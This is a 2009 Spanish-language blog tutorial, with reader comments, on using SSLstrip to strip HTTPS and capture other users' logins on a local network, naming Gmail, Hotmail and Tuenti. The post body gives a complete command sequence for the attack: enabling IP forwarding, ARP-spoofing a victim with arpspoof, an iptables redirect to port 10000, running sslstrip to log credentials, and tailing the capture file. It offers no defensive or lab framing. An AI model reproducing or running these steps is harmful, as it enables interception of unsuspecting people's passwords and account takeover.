viernes, 2 de octubre de 2009

Tutorial SSLstrip

SSLstrip nos permite sniffar usuarios y contraseñas encriptadas en HTTPS. Esto lo hace realizando un ataque MITM entre el servidor y nuestro objetivo conectandose al servidor mediante HTTP (sin encriptar) en lugar de HTTPS (encriptado) con lo que los datos son visibles. Algunos ejemplos de páginas que utilizan esta encriptacion son Gmail, Hotmail o Tuenti.

Bueno primero nos descargamos un script en python desde
             http://www.thoughtcrime.org/software/sslstrip/index.html

o la descarga directa
             http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Una vez descargado lo extraemos y obtendremos como resultado una carpeta llamada sslstrip-0.6 (la version actual).

A continuación abrimos una shell y ponemos:
              echo "1" > /proc/sys/net/ipv4/ip_forward

ahora realizamos el ataque MITM
             # arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}

a modo de  ejemplo
             #  arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

abrimos otra shell y cambiamos la redireccion de puertos usando las iptables
            # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

 una vez echo lo anterior lanzamos el SSLstrip    

     # python sslstrip.py -w {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # python sslstrip.py -w morsa

volvemos a abrir otra shell si queremos ver en tiempo real la informacion obtenida

         # tail -f {nombre_del_archivo_de_captura}

a modo de  ejemplo

         # tail -f morsa

Para terminar si posteriormente queremos ver los archivos del fichero de captura hacemos
       nano {nombre_del_archivo_de_captura}

o a modo de  ejemplo
         # nano morsa


Bueno esto es todo relativo al SSLstrip un saludo y nos vemos.


Alpha.Aetsu
       




Publicado por Alpha Aetsu en 0:48

5 comentarios:

  1. pipe2 de octubre de 2009, 7:26

    hola,. muy buen tutorial, pero tengo una duda, el sslstrip funcion para redes lan o tambien funciona para redes inalambricas?, te agradeceria le ayuda.

    gracias

    ResponderEliminar
  2. Alpha Aetsu3 de octubre de 2009, 12:27

    Funciona a nivel de red local, ya estes conectado por wi-fi (conexion inalambria) o por cable (ethernet).

    ResponderEliminar
  3. Anónimo11 de diciembre de 2009, 22:23

    hola, curiosa manera de usar sslsrtip :)



    # tail -f nombredecaptura

    sale en texto plano la informacion de la captura??


    un saludo y gracias por compartir esta informacion.

    l00k

    ResponderEliminar
  4. Anónimo18 de diciembre de 2009, 12:28

    No hace falta que contestes ya lo descubri por mi mismo, por lo que parece muchos blog aparentan saber del tema, pero veo que sabeis menos que yo.
    Sin ningun animo de ofender reciv un cordial saludo

    ResponderEliminar
  5. Anónimo27 de febrero de 2010, 13:51

    no tienen idea son todos reposteria de otras paginas

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)